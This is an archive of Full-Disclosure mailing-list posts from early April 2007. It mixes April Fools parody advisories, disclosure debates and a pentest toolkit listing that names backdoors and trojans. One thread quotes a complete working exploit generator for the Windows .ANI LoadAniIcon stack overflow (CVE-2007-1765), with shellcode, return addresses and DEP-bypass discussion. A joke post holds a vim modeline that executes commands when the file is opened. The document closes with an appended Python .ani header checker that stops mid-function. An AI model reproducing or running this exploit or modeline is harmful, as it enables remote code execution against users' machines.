From sil at infiltrated.net Sun Apr 1 04:05:40 2007
From: sil at infiltrated.net (J. Oquendo)
Date: Sat, 31 Mar 2007 22:05:40 -0500
Subject: [Full-disclosure] Cisco IP Phone vulnerability
Message-ID: <20070401030540.GA54469@infiltrated.net>

-----BEGIN LSD SIGNED MESSAGE-----

Infiltrated.net Security Advisory:
Cisco IP Phone Denial of Service
http://www.infiltrated.net/ciscoIPPhone7960.html
Revision 6.9

For Public Release

Summary
The Cisco IP Phones are subject to a denial of service.

This vulnerability has not yet been documented by Cisco but it should be allocated the bug ID 31337 by staff @ PSIRT

This advisory will be posted at http://www.infiltrated.net/ciscoIPPhone7960.html

Affected Products
All Cisco IP Phones

Proof of Concept
http://infiltrated.net/7960poc.jpg

Cisco Security Procedures
Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
All Cisco security advisories are available at http://www.cisco.com/go/psirt.

Details
Cisco IP Phones are subject to a denial of service. Users who disconnect their ethernet cables will lose their dial tones and their present call will drop as well as subsequent incoming calls.

While the attack may be local at present time, security engineers Infiltrated Networks (a division of Fscker Inc. with no relation to Halliburton) are devising telekinetic attacks along with Miss Cleo in order to provide a working disconnection attack tool.

Impact
All your phone sex belongs to null 0

Software Versions and Fixes
The only fix is to plug your phone back into a PoE switch or plug in its power cord.

Obtaining Fixed Software
Infiltrated Networks and Fscker Inc. is offering its services at the low price of $1000.00 an hour in consulting fees to remedy this attack, with a 100 hour minimum retainer fee. In fact, for those seeking to purchase a PoC code of the mentioned vulnerability, contact us, we'll gladly take your milk money.

Workarounds
Don't unplug your phone. Don't unplug your PoE switches. Don't live in areas where electricity is sporadic. Don't play with matches, and don't drive while under the influence of anything that is currently mentioned at http://www.bumwine.com

Exploitation and Public Announcements
Infiltrated.net is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

This vulnerability was reported to us losers, by another bigger loser who wishes to retain his or her anonymity out of fear of obtaining "Michael Lynn Disease" where a frivolous denial of service attack via litigation will ensue and weaken the immune system.

Status of This Notice: FINAL
This is a final Infiltrated.net advisory. Although we cannot guarantee the accuracy of all statements in this notice, we still passed it on to you the consumer knowing full well a cease and desist letter will be sent and added to our collection. All of the facts have however been checked to the best of our ability while not under the influence of Prozac, Valtrex, Valium, Lithium and lest we forget, weapons of mass destruction of which you will not find since we have them buried in the secret stash boxes of our Nissan, Lexus, WRX, and Cherokee alongside our Glocks.

Revision History
Revision 6.9 Initial public release

This notice is Copyright 2007 by Infiltrated.net. This notice may be redistributed freely after the release date given at the top of the text, provided that redistributed copies are complete and unmodified, and include all date and version information. Pictures of your fiance, wife, girlfriend can be e-mailed to us if said individuals did not yet e-mail to us on their own. Infiltrated Networks, sil, and our oddball affiliates remind those on the security scene to keep it real.
From nytrokiss at gmail.com Sun Apr 1 04:58:54 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Sat, 31 Mar 2007 20:58:54 -0700
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To:
References:
Message-ID: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com>

The issue is that this only works with DEP turned off!

On 3/31/07, dev code wrote:
>
> I didn't include the DoS version of this, it just calls ExitProcess(). If
> you have SP2, you can try going to http://sicotik.com/ink/test.html.
> Thanks.
>
>
> >From: wac
> >To: "dev code"
> >CC: full-disclosure at lists.grok.org.uk
> >Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
> >Date: Sat, 31 Mar 2007 06:53:34 -0500
> >
> >Hello:
> >
> >Does this work in *fully patched* XP pro + SP2? Mine seems to be totally
> >immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably
> >landing somewhere else in memory).
> >
> >
> >On 3/30/07, dev code wrote:
> >>
> >>/*
> >>* Copyright (c) 2007 devcode
> >>*
> >>*
> >>* ^^ D E V C O D E ^^
> >>*
> >>* Windows .ANI LoadAniIcon Stack Overflow
> >>* [CVE-2007-1765]
> >>*
> >>*
> >>* Description:
> >>* A vulnerability has been identified in Microsoft Windows,
> >>* which could be exploited by remote attackers to take complete
> >>* control of an affected system. This issue is due to a stack overflow
> >>* error within the "LoadAniIcon()" [user32.dll] function when rendering
> >>* cursors, animated cursors or icons with a malformed header, which could
> >>* be exploited by remote attackers to execute arbitrary commands by
> >>* tricking a user into visiting a malicious web page or viewing an email
> >>* message containing a specially crafted ANI file.
> >>*
> >>* Hotfix/Patch:
> >>* None as of this time.
> >>*
> >>* Vulnerable systems:
> >>* Microsoft Windows 2000 Service Pack 4
> >>* Microsoft Windows XP Service Pack 2
> >>* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
> >>* Microsoft Windows XP Professional x64 Edition
> >>* Microsoft Windows Server 2003
> >>* Microsoft Windows Server 2003 (Itanium)
> >>* Microsoft Windows Server 2003 Service Pack 1
> >>* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
> >>* Microsoft Windows Server 2003 x64 Edition
> >>* Microsoft Windows Vista
> >>*
> >>* Microsoft Internet Explorer 6
> >>* Microsoft Internet Explorer 7
> >>*
> >>* This is a PoC and was created for educational purposes only. The
> >>* author is not held responsible if this PoC does not work or is
> >>* used for any other purposes than the one stated above.
> >>*
> >>* Notes:
> >>* For this to work on XP SP2 on explorer.exe, DEP has to be turned
> >>* off.
> >>*
> >>*/
> >>/* Header names were stripped by the archive; these are the ones the calls below need. */
> >>#include <stdio.h>   /* printf, fopen, fwrite, fclose */
> >>#include <stdlib.h>  /* atoi */
> >>#include <string.h>  /* memset, memcpy */
> >>
> >>/* ANI Header */
> >>unsigned char uszAniHeader[] =
> >>"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
> >>"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
> >>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> >>"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
> >>"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
> >>"\x61\x6E\x69\x68\xA8\x03\x00\x00";
> >>
> >>/* Shellcode - metasploit exec calc.exe ^^ */
> >>unsigned char uszShellcode[] =
> >>"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
> >>"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
> >>"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
> >>"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
> >>"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
> >>"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
> >>"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
> >>"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
> >>"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
> >>"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
> >>"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
> >>"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
> >>"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
> >>"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
> >>"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
> >>"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
> >>"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
> >>"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
> >>"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
> >>"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
> >>"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
> >>
> >>char szIntro[] =
> >>"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
> >>"\t\t\tdevcode (c) 2007\n"
> >>"[+] Targets:\n"
> >>"\tWindows XP SP2 [0]\n"
> >>"\tWindows 2K SP4 [1]\n\n"
> >>"Usage: ani.exe ";
> >>
> >>typedef struct {
> >>    const char *szTarget;
> >>    unsigned char uszRet[5];
> >>} TARGET;
> >>
> >>TARGET targets[] = {
> >>    { "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */
> >>    { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
> >>};
> >>
> >>int main( int argc, char **argv ) {
> >>    char szBuffer[1024];
> >>    FILE *f;
> >>
> >>    if ( argc < 3 ) {
> >>        printf("%s\n", szIntro );
> >>        return 0;
> >>    }
> >>
> >>    printf("[+] Creating ANI header...\n");
> >>    memset( szBuffer, 0x90, sizeof( szBuffer ) );
> >>    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
> >>
> >>    printf("[+] Copying shellcode...\n");
> >>    memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
> >>    memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );
> >>
> >>    printf("%s\n", argv[2] );
> >>    f = fopen( argv[2], "wb" );
> >>    if ( f == NULL ) {
> >>        printf("[-] Cannot create file\n");
> >>        return 0;
> >>    }
> >>
> >>    fwrite( szBuffer, 1, 1024, f );
> >>    fclose( f );
> >>    printf("[+] .ANI file successfully created!\n");
> >>    return 0;
> >>}
> >>
> >>_______________________________________________
> >>Full-Disclosure - We believe in it.
> >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>Hosted and sponsored by Secunia - http://secunia.com/
> >>
>

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com

From sandr8 at gmail.com Sun Apr 1 05:07:39 2007
From: sandr8 at gmail.com (alessandro salvatori)
Date: Sat, 31 Mar 2007 21:07:39 -0700
Subject: [Full-disclosure] Cisco IP Phone vulnerability
In-Reply-To: <20070401030540.GA54469@infiltrated.net>
References: <20070401030540.GA54469@infiltrated.net>
Message-ID: <517e86fb0703312107p2366ea36g35d37cbed9e90c73@mail.gmail.com>

Hey it is still March 31st in CA!

--
A l e s s a n d r o S a l v a t o r i

On 3/31/07, J. Oquendo wrote:
> -----BEGIN LSD SIGNED MESSAGE-----
>
> Infiltrated.net Security Advisory:
> Cisco IP Phone Denial of Service
> http://www.infiltrated.net/ciscoIPPhone7960.html
> Revision 6.9
>
> For Public Release
>
> Summary
> The Cisco IP Phones are subject to a denial of
> service.
>
> This vulnerability has not yet been documented
> by Cisco but it should be allocated the bug ID
> 31337 by staff @ PSIRT
>
> This advisory will be posted at
> http://www.infiltrated.net/ciscoIPPhone7960.html
>
> Affected Products
> All Cisco IP Phones
>
> Proof of Concept
> http://infiltrated.net/7960poc.jpg
>
> Cisco Security Procedures
> Complete information on reporting security
> vulnerabilities in Cisco products, obtaining
> assistance with security incidents, and
> registering to receive security information from
> Cisco, is available on Cisco's website at
> http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
> All Cisco security advisories are available at
> http://www.cisco.com/go/psirt.
>
>
> Details
> Cisco IP Phones are subject to a denial of service.
> Users who disconnect their ethernet cables will
> lose their dial tones and their present call will
> drop as well as subsequent incoming calls.
>
> While the attack may be local at present time,
> security engineers Infiltrated Networks (a division
> of Fscker Inc. with no relation to Halliburton)
> are devising telekinetic attacks along with Miss
> Cleo in order to provide a working disconnection
> attack tool.
>
>
> Impact
> All your phone sex belongs to null 0
>
> Software Versions and Fixes
> The only fix is to plug your phone back into a PoE
> switch or plug in its power cord.
>
> Obtaining Fixed Software
> Infiltrated Networks and Fscker Inc. is offering
> its services at the low price of $1000.00 an hour
> in consulting fees to remedy this attack, with a
> 100 hour minimum retainer fee. In fact, for those
> seeking to purchase a PoC code of the mentioned
> vulnerability, contact us, we'll gladly take your
> milk money.
>
> Workarounds
> Don't unplug your phone. Don't unplug your PoE
> switches. Don't live in areas where electricity
> is sporadic. Don't play with matches, and don't
> drive while under the influence of anything that
> is currently mentioned at http://www.bumwine.com
>
> Exploitation and Public Announcements
> Infiltrated.net is not aware of any public
> announcements or malicious use of the
> vulnerability described in this advisory.
>
> This vulnerability was reported to us
> losers, by another bigger loser who wishes
> to retain his or her anonymity out of
> fear of obtaining "Michael Lynn Disease"
> where a frivolous denial of service attack
> via litigation will ensue and weaken the
> immune system.
>
> Status of This Notice: FINAL
> This is a final Infiltrated.net advisory. Although
> we cannot guarantee the accuracy of all statements
> in this notice, we still passed it on to you the
> consumer knowing full well a cease and desist letter
> will be sent and added to our collection. All of the
> facts have however been checked to the best of our
> ability while not under the influence of Prozac,
> Valtrex, Valium, Lithium and lest we forget, weapons
> of mass destruction of which you will not find since
> we have them buried in the secret stash boxes of our
> Nissan, Lexus, WRX, and Cherokee alongside our Glocks.
>
>
> Revision History
> Revision 6.9 Initial public release
>
>
>
> This notice is Copyright 2007 by Infiltrated.net.
> This notice may be redistributed freely after the
> release date given at the top of the text,
> provided that redistributed copies are complete
> and unmodified, and include all date and version
> information. Pictures of your fiance, wife,
> girlfriend can be e-mailed to us if said
> individuals did not yet e-mail to us on their
> own. Infiltrated Networks, sil, and our oddball
> affiliates remind those on the security scene to
> keep it real.
>

From aviram at beyondsecurity.com Sun Apr 1 06:18:39 2007
From: aviram at beyondsecurity.com (Aviram Jenik)
Date: Sun, 1 Apr 2007 01:18:39 -0400
Subject: [Full-disclosure] ISP in the UK Terminates Account after Full Disclosure
Message-ID: <200704010118.39798.aviram@beyondsecurity.com>

Short version: beThere, a UK ISP distributed routers to customers with the telnet port open and a default administrator password. A bit embarrassing.

Sid, who discovered the hole, originally blogged about it on SecuriTeam blogs, which resulted in the ISP calling us within 24 hours to have Sid take down the password information (as if that can't be figured out by the average script kiddie), but a month and a half later the problem is still there. I guess we know where their priorities are.

What else didn't take them long to do? Terminating Sid's Internet account. Yeah, that'll teach him a lesson telling the world about security holes in beThere's service. Bad customer. Go bother someone else.

Oh, and the backdoor? Still there, thanks for asking.
My longer rant here:
http://blogs.securiteam.com/index.php/archives/860

And here's Sid's original disclosure:
http://blogs.securiteam.com/index.php/archives/826

- Aviram

From druid at caughq.org Sun Apr 1 07:16:16 2007
From: druid at caughq.org (I)ruid)
Date: Sun, 01 Apr 2007 01:16:16 -0500
Subject: [Full-disclosure] CAU-2007-0001: Window Transparency Information Disclosure
Message-ID: <1175408177.2463.24.camel@localhost>

Computer Academic Underground
http://www.caughq.org
Security Advisory

===============/========================================================
Advisory ID:    CAU-2007-0001
Release Date:   04/01/2007
Title:          Window Transparency Information Disclosure
Application/OS: Windows made from silica or plastics
Topic:          Panes used in windows are usually transparent, allowing
                sensitive information to be observed from the outside.
Vendor Status:  Not Notified
Attributes:     Remote, Information Disclosure
Advisory URL:   http://www.caughq.org/advisories/CAU-2007-0001.txt
Author/Email:   I)ruid
===============/========================================================

Overview
========

An information disclosure attack can be launched against buildings that make use of windows made of glass or other transparent materials by observing externally-facing information through the window.

Impact
======

Sensitive information stored on whiteboards, cork-boards, calendars, post-it notes, or other medium which faces a window is susceptible to being disclosed to a remote entity.

Affected Systems
================

1) Silica Windows
2) Plastic Windows

Technical Explanation
=====================

Silica-based (glass) windows have molecular structures that are very random like a liquid yet retain the strong bond and rigidity of a solid. Transparent and translucent plastic windows have molecular structures wherein the long-chain molecules (polymers) in the plastic are made to settle into a similarly random pattern. These random patterned molecular structures have electrons that do not absorb the energy of photons in the visible spectrum, thus allowing visible light to traverse them. This traversal of visible light allows the human eye to observe an object through the window.

Solutions & Recommendations
===========================

1) Do not store sensitive information on any medium which faces a window.
2) Draw blinds or curtains over the vulnerable window so as to prevent remote observers from viewing any sensitive information.
3) Apply an opaquing layer to vulnerable windows.

Exploitation
============

Use the naked eye, binoculars, or a telescoping lens to peer through the windows of your target building. Locate information storing mediums such as whiteboards, cork-boards, or post-it notes which face outward through the window. Read the medium's content.

References
==========

Howstuffworks "What makes glass transparent?"
http://science.howstuffworks.com/question404.htm

Credits & Gr33ts
================

Computer Academic Underground
Prof. Julius Sumner Miller

--
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org
From vcomics at yahoo.ca Sun Apr 1 08:26:30 2007
From: vcomics at yahoo.ca (V Comics)
Date: Sun, 1 Apr 2007 03:26:30 -0400 (EDT)
Subject: [Full-disclosure] April 1 joke
Message-ID: <969102.78862.qm@web63807.mail.re1.yahoo.com>

vim: foldmethod=expr:foldexpr=feedkeys("\\\\x3a%!cat\\x20-n\\\\\\x3a%s/./\:)/g\\\\\\x3aq!\\"):

a

From tecklord at argocom.cv.ua Sun Apr 1 10:59:01 2007
From: tecklord at argocom.cv.ua (Valery Marchuk)
Date: Sun, 1 Apr 2007 12:59:01 +0300
Subject: [Full-disclosure] Maria Sharapova is a Cisco Certified Specialist
Message-ID: <0ab501c77444$633abb20$030414ac@pc>

Maria Sharapova, one of the most famous tennis players, gained the CCIE status yesterday.
More at http://www.securitylab.ru/news/extra/293608.php

From Larry at larryseltzer.com Sun Apr 1 12:49:58 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Sun, 1 Apr 2007 07:49:58 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com>
References: <8a6b8e350703312058i1b7470fbp708639d246d27bda@mail.gmail.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>

>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the Microsoft advisory (http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From research at matousec.com Sun Apr 1 08:38:55 2007
From: research at matousec.com (Matousec - Transparent security Research)
Date: Sun, 01 Apr 2007 09:38:55 +0200
Subject: [Full-disclosure] Norton Multiple insufficient argument validation of hooked SSDT function Vulnerability
Message-ID: <460F618F.1040803@matousec.com>

Hello,

We would like to inform you about a vulnerability in Symantec Norton products.

Description:
Symantec Norton Personal Firewall hooks many functions in SSDT and in at least two cases it fails to validate arguments that come from the user mode. User calls to NtCreateMutant and NtOpenEvent with invalid argument values can cause system crashes because of errors in Norton driver SPBBCDrv.sys. Further impacts of this bug (like arbitrary code execution in the kernel mode) were not examined.

Vulnerable software:
* Norton Personal Firewall 2006 version 9.1.1.7
* Norton Personal Firewall 2006 version 9.1.0.33
* probably all versions of Norton Personal Firewall 2006, Norton Internet Security 2006 and other products that use SPBBCDrv driver
* possibly older versions of Norton Personal Firewall and Norton Internet Security

More details and a proof of concept including its source code are available here:
http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php

Regards,

--
Matousec - Transparent security Research
http://www.matousec.com/

From fred.frazao at fredericofrazao.com Sun Apr 1 12:11:58 2007
From: fred.frazao at fredericofrazao.com (Fred)
Date: Sun, 01 Apr 2007 12:11:58 +0100
Subject: [Full-disclosure] Kcpentrix 2.0 is Out !!
Message-ID: <1175425918.21398.31.camel@Fred>

Dear List,

The Kcpentrix Project was founded in May 2005. KCPentrix 1.0 was a liveCD designed to be a standalone Penetration testing toolkit for pentesters, security analysts and System administrators.

What's New in KcPentrix 2.0:

Now release 2.0 is a liveDVD. It features a lot of new or up to date tools for auditing and testing a network, from scanning and discovering to exploiting vulnerabilities.

Kcpentrix is based on SLAX 5, a Slackware live DVD. The powerful modularity which Kcpentrix uses allows us to easily customize our version, and include whichever modules we need.

KCPENTRIX 2.0 is the most innovative and promising KCPENTRIX ever. It switched to the 2.6 kernel line. Zisofs compression was replaced by SquashFS, which provides a better compression ratio and higher read speed.

Tools List:

Server tools: Mysql PostgreSQL apache php DNS DHCP FTP SMTP POP3 IMAP SSH TFTPD
Internet tools: Skype Firefox Gftp Gaim
Arp: arping-2.04 seringe arp-sk arpspoof
backdoors: hbkdr.tar.gz hbkdr.zip sbd-1.37.tar.gz ssheater-1.1.tar.gz x86-linux-connectback.c x86-linux-portbind.c
Bruteforce: adsmb-0.3 adsnmp-0.1 brutus-0.9.2 crackcvspass-v0.1 john-1.7.2 Online_Rainbow onesixtyone-0.3.2 nat-1.0.4 mdcoll lodowep SIPcrack-0.1 smbat TFTP-bruteforce VNCcrack-0.9.1 wyd crunch md5crack.pl ophcrack thc-pptp-bruter vncrack
cisco: brute-enable-v.1.0.2 cisco-auditing-tool-v.1.0 cisco-global-exploiter cisco-scanner-v.1.3 cisco-torch-0.4b ciscopack copy-router-config-v.0.1 eigrp-tools ios-w3-vul ios7decrypt-v.1.1 jitney-0.10
database: sqlbrute.py bsqlbf.pl mysql_bftools metacoretex-0.8.0 oat oscanner_bin checkpwd sidguess tnscmd10g.pl bfora.pl dbcool_audit.pl oracletest.pl tnsprobe.sh oracle-scanner-v.1.0.6 oracle-dump-sids-v0.0.1 oat-v.1.3.1
enumeration: dnswalk DNSBruteforce.py dns-ptr dnsenum dnsmap dns-predict-v.0.0.2 fingergoogle-1.1 googrape-v.0.1 gooscan-v0.9 goog-mail.py qgoogle.py google-search dnspython-1.3.2 dnslib.py httplib.py inet-enum.py isr-form-1.0 ldap-enum-v.003 ldapbrowser list-urls lsrtunnel-0.2.1 mibble-2.6 mibble-2.7 nmbscan-1.2.4 nstx relayscanner revhosts smb-enum smtp-vrfy snmpenum.pl httprint_301
exploits: client-side exploit-tree framework-2.5 framework-2.6 framework-2.7 framework3 Beta framework-3.0 microsoft milw0rm packetstorm secfocus win32 Bin's
Firewall: ftester-1.0 Morena hping2
forensics: autopsy-2.06 sleuthkit sleuthkit-2.03
Fuzzers: bed bed-v.0.5 cirt-fuzzer clfuzz fuzzer-1.1 fuzzer-1.2 fuzzer-mod mistress Peach pirana-0.2.1 snmp-fuzzer-0.1.1 spike
IDS: nemesis snort ossec
misc-tools: find_ddos3.1 fping-2.4b2 ipgenv2
printer: hijetter pft
proxies: 3proxy_0_5_2 paros penproxy-0.4.10
scanners: banshee-3.3 dcom_scanner hydra-5.3 knocker-0.7.1 lsrscan-1.0 ike-scan amap nikto-1.35 pbnj nbtscan nmap nmapfe sinfp.pl VNC_bypauth
Sniffers: aimsniff-0.9d aimsniff-1.0beta PHoss xspy dsniff p0f wireshark
spoofing: netsed
tunnelling: 3proxy iodine-0.3.2 proxytunnel-1.6.3
Web: asp-audit metoscan04 proxyfinder-1.0 sqlibf sqlinject-1.1 wal easy-scraper.pl hacker_webkit.tar.gz mysql-miner.pl put.pl
wireless: aircrack-2.2-beta1 aircrack-ng-0.6.2 airpwn-1.3 airsnarf-0.2 asleap-1.4 wifitap hotspotter-0.4 fakeap-0.3.2 cowpatty-2.0 wep_crack wep_decrypt
windows-binaries:
- databases: Absinthe-1.4.1-Linux sqlexec20.exe
- Misc: enumplus exe2bat.exe Fport.exe klogger.exe mbenum.exe radmin.exe plink.exe nc.exe nbtenum.exe mstsc.exe regdmp.exe sbd.exe tftpd32.exe vnc-ssh vncviewer.exe WHOAMI.EXE wget.exe
- pstools: pstoreview.exe pssuspend.exe psshutdown.exe psservice.exe pskill.exe pslist.exe psloggedon.exe psloglist.exe pspasswd.exe Psinfo.exe psgetsid.exe psfile.exe psexec.exe
- passwd-attack: ipcscan lbrute smbcrack2 cachedump FindPass.exe pulist.exe PWDump4.exe SAMDUMP.EXE tsgrinder-2.03.zip TSgrinder.rar
- Scanners: hscan ipcscan languard ntscangui retina-scanners DSScan.exe dfind.exe CIScan.exe X-Scan-v2.3-en superscan gdiscan.exe HS_WINS MS05039Scan.exe MyDoomScanner.exe SQLScan.exe SNScan.exe sl.exe RPCScan2.exe NetSchedScan.exe SynScan
- sniffers: rawsniffer ngrep.exe
- trojans: sbd.exe Institution_2004.zip
- vpn: ike-scan ikeprobe

Thanks to all beta testers and supporters, special thanks to the friends from Security-database.com and SecurityDistro.com

You can Download the iso @ Kcpentrix.com / knowledgecave.com and Securitydistro.com.

Best regards,
Fred aka HC

From giorgio.fedon at gmail.com Sun Apr 1 14:52:59 2007
From: giorgio.fedon at gmail.com (Giorgio Fedon)
Date: Sun, 1 Apr 2007 15:52:59 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID:

Hi Max, you are promoting Software Piracy.
Like a group of warez people so called - "Team IND"

2007/3/30, Max Moser :
>
> Dear List
>
> During the last year, rumours had come to my attention that apparently
> it is possible to transform a standard 30USD Bluetooth(r) dongle into
> a full-blown Bluetooth(r) sniffer. Thinking you absolutely need
> Hardware to be able to hop 79 channels 1600 times a second I was
> rather suspicious about these claims.

From jf at danglingpointers.net Sun Apr 1 23:04:28 2007
From: jf at danglingpointers.net (jf)
Date: Sun, 1 Apr 2007 22:04:28 +0000 (UTC)
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID:

Hi,

You missed the point completely. He's not promoting software piracy but showing that the high-dollar bluetooth sniffers are not required and that your average dongle can do everything that a proprietary product can.

Also, if you're going to make thinly veiled adverts for a group, you should probably ensure that they are findable via google or similar.
On Sun, 1 Apr 2007, Giorgio Fedon wrote:

> Date: Sun, 1 Apr 2007 15:52:59 +0200
> From: Giorgio Fedon
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Busting The Bluetooth Myth
>
> Hi Max, you are promoting Software Piracy.
> Like a group of warez people so called - "Team IND"
>
> 2007/3/30, Max Moser :
> >
> > Dear List
> >
> > During the last year, rumours had come to my attention that apparently
> > it is possible to transform a standard 30USD Bluetooth(r) dongle into
> > a full-blown Bluetooth(r) sniffer. Thinking you absolutely need
> > Hardware to be able to hop 79 channels 1600 times a second I was
> > rather suspicious about these claims.
>

From giorgio.fedon at gmail.com Sun Apr 1 16:17:05 2007
From: giorgio.fedon at gmail.com (Giorgio Fedon)
Date: Sun, 1 Apr 2007 17:17:05 +0200
Subject: [Full-disclosure] Busting The Bluetooth Myth
In-Reply-To:
References:
Message-ID:

| Hi,
|
| You missed the point completely. He's not promoting software piracy but
| showing that the high-dollar bluetooth sniffers are not required and that
| your average dongle can do everything that a proprietary product can.

The "thinly veiled advert" was to mention that either:

1. He is using a pirated version of the bluetooth sniffer;
2. He has downloaded a pirated version of the bluetooth sniffer and printed a pdf of the readme inside;
3. He is the author of the pirated version of the bluetooth sniffer.

From devcode29 at hotmail.com Sun Apr 1 16:05:37 2007
From: devcode29 at hotmail.com (dev code)
Date: Sun, 01 Apr 2007 15:05:37 +0000
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local>
Message-ID:

I made a mistake in including "jmp esp" for XP SP2 because the stack cannot be executed (due to DEP of course :P). It is completely possible to execute shellcode if we can do some DEP bypass (ie. ret2libc attack, etc..) to add execute access to the stack and jmp to our code. My PoC I updated yesterday (added as an attachment to the full disclosure post) returns to ExitProcess() and closes explorer.exe upon viewing the .ani file, just to show that it is possible to do our own shiznat in SP2.

>From: "Larry Seltzer"
>To:
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sun, 1 Apr 2007 07:49:58 -0400
>
>>>The issue is that this only works with DEP turned off!
>
>Interesting point. I haven't seen this mentioned anywhere, including the
>Microsoft advisory
>(http://www.microsoft.com/technet/security/advisory/935423.mspx).
>
>Has anyone actually tested this with DEP on/off to be sure?
>
>Larry Seltzer
>eWEEK.com Security Center Editor
>http://security.eweek.com/
>http://blog.eweek.com/blogs/larry_seltzer/
>Contributing Editor, PC Magazine
>larryseltzer at ziffdavis.com
>
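A defender-side check for the malformed header this thread is about, added here as an example (it is not code from any post in the thread or from the PoC author): it walks the RIFF chunks of an .ani file and flags any anih chunk whose declared length is not the 36-byte ANIHEADER that LoadAniIcon reads into a fixed-size structure, which is exactly what the PoC's second anih chunk (0x3A8 bytes) does. The two sample files are constructed inline; the malformed one mirrors the chunk layout of the header bytes quoted earlier in the thread.

```python
import struct

# sizeof(ANIHEADER): cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, jifRate, flags
# (nine DWORDs). LoadAniIcon reads the 'anih' chunk into a structure of this fixed size,
# so any other declared length is the malformed header the thread discusses.
ANIH_EXPECTED = 36


def riff_chunks(data, offset, end):
    """Yield (fourcc, size, payload_offset, truncated) for each chunk in data[offset:end].

    Walks into LIST containers (4-byte list type followed by sub-chunks). A chunk whose
    declared size runs past its container is reported with truncated=True and ends the walk.
    """
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        size = struct.unpack_from("<I", data, offset + 4)[0]
        payload = offset + 8
        if payload + size > end:
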